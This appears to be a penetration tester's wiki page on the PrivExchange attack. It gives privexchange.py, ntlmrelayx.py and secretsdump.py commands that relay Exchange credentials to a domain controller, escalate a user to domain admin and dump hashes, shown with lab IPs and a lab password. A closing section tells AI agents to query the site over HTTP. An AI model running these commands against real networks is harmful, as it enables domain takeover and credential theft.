# PrivExchange

## Good Resources to follow

{% embed url="<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>" %}

## Abusing Exchange with a credential

$ python3 privexchange.py -ah \<My Internal IP> \<Mail Domain Here> -u \<Target Username> -d \<domain name>

$ python3 ntlmrelayx.py -t ldap\://\<FQDN of DC here> --escalate-user \<Target Username>

## Walkthrough

PrivExchange takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirkjann a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server’s credentials, then relaying the credentials in the response to the Domain Controller via ntlmrelayx, then modifying a user’s privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user.

$ python3 ntlmrelayx.py -t ldap\:// --escalate-user

Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain.

$ python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201

Privexchange.py makes the API call to the exchange. If the permissions are set correctly, we can escalate the targeted user to have DA privs. NTLM relays the servers creds to the master DC, then escalates \<test user>  privs.

We can then use secretsdump.py to dump the hashes on the DC!

$ secretsdump.py /@ -just-dc

{% embed url="<https://github.com/dirkjanm/PrivExchange>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.brinkles.wiki/tools/internal-tools/privexchange.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.